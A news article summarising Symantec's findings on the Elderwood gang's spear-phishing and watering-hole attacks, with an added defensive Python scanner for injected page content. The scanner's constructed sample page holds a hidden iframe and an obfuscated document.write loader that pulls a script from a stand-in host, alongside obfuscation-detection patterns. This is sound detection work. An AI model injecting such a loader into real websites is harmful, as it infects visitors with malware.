‘Elderwood’ comes from a source code variable used by the attackers. Symantec uses the name to describe both the gang and the attack infrastructure it uses. Aurora is the attack that brought the phrase advanced persistent threat, or APT, into common use, and the continuing activity of the Elderwood gang shows what typifies, if not defines, the advanced persistent threat.
The gang is technically accomplished and well-resourced. It seems able to draw on a steady supply of zero-day vulnerabilities, is accomplished at targeted social engineering, knows precisely what it is looking for, and is patient in achieving those ends. “The targeted industry sectors,” notes Symantec, “include, but are not restricted to: defense, various defense supply chain manufacturers, human rights and non-governmental organizations (NGOs), and IT service providers.”
The traditional attacks are launched through targeted spear-phishing, either an email with an infected attachment or a lure that tricks the target into visiting an infected website. More recently Symantec has noted an increased use of the watering hole technique, so named after predators that wait at a watering hole for their prey to visit. If you know the interests of your target (easily gleaned from social networking sites), then you know what types of sites that target is likely to visit. “For example,” says Symantec, “people who visit the Amnesty International Hong Kong website are most likely visiting because they are interested in human rights issues in Hong Kong.”
Having identified likely watering holes, the Elderwood gang hacks into the relevant website and injects an exploit to infect the target next time he or she visits. “Three of the most recent zero-day exploits were used in watering hole attacks, an indication that this approach is gaining momentum,” says the company.
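The injection Symantec describes leaves traces in the compromised page itself: a script or iframe pointing at a host the site has no business loading from, a zero-size frame, or an obfuscated inline loader. The following is an added example, not code from the article or from Symantec, of a small scanner that a site owner or a defender monitoring a watering-hole candidate could run over a fetched page to surface those traces. The sample page, the site host `www.example-ngo.org`, the trusted CDN host and the third-party hostnames are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Markers that commonly appear in injected, obfuscated loader scripts.
_OBFUSCATION_RE = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|"
    r"(?:\\x[0-9a-fA-F]{2}){8,}|(?:%[0-9a-fA-F]{2}){8,}"
)
_HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class InjectedResourceFinder(HTMLParser):
    """Flags resources a page should not be loading: off-site scripts and
    frames, javascript:/data: URLs, hidden iframes and obfuscated inline JS."""

    def __init__(self, site_host, trusted_hosts=()):
        super().__init__()
        self.site_host = site_host.lower()
        self.trusted_hosts = {h.lower() for h in trusted_hosts}
        self.findings = []          # list of (kind, detail) tuples, in page order
        self._in_script = False
        self._script_chunks = []

    def _check_url(self, tag, url):
        parsed = urlparse(url.strip())
        if parsed.scheme in ("javascript", "data"):
            self.findings.append((f"{tag}-{parsed.scheme}-url", url[:60]))
            return
        host = parsed.hostname  # None for relative URLs, i.e. same origin
        if host and host.lower() != self.site_host and host.lower() not in self.trusted_hosts:
            self.findings.append(("external-resource", f"<{tag}> {url}"))

    @staticmethod
    def _is_hidden(attrs):
        tiny = {"0", "1", "0px", "1px"}
        if attrs.get("width", "").strip() in tiny or attrs.get("height", "").strip() in tiny:
            return True
        return bool(_HIDDEN_STYLE_RE.search(attrs.get("style", "")))

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            self._script_chunks = []
        if tag in ("script", "iframe", "frame", "embed") and a.get("src"):
            self._check_url(tag, a["src"])
        elif tag == "object" and a.get("data"):
            self._check_url(tag, a["data"])
        if tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            self._script_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_chunks)
            if _OBFUSCATION_RE.search(body):
                self.findings.append(("obfuscated-inline-script", body.strip()[:60]))


def scan_page(html, site_host, trusted_hosts=()):
    """Return the list of (kind, detail) findings for one fetched page."""
    finder = InjectedResourceFinder(site_host, trusted_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: a page on a fictional NGO site carrying two injected
# elements, a zero-size iframe to a third-party host and an obfuscated loader.
SAMPLE_PAGE = """<html><head>
<script src="/static/site.js"></script>
<script src="https://cdn.example-ngo.org/jquery.min.js"></script>
<iframe src="https://stats.example-counter.net/t.php" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22//dl.example-bad.net/x.js%22%3E%3C/script%3E'));</script>
</head><body><p>Human rights news</p></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "www.example-ngo.org", ["cdn.example-ngo.org"]):
        print(f"{kind:26s} {detail}")
```

Run against the sample page this reports the hidden third-party iframe twice (once as an off-site resource, once as hidden) and the `unescape(` loader once, while the site's own script and the allowlisted CDN pass. In practice the value comes from running it on a schedule and diffing against a known-good baseline of the site's legitimate third-party hosts, since a genuine analytics or CDN reference looks identical to an injected one until you know which hosts belong.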
The gang, adds Symantec, “is focused on wholesale theft of intellectual property and clearly has the resources, in terms of manpower, funding, and technical skills, required to implement this task.” A high proportion of these targets seem to be in the US defense industry. Symantec suggests that a new round of Elderwood attacks can be expected in early 2013, and particularly warns that subsidiaries and business partners in the supply chain may be targeted first, and then used as a stepping stone up to the main target.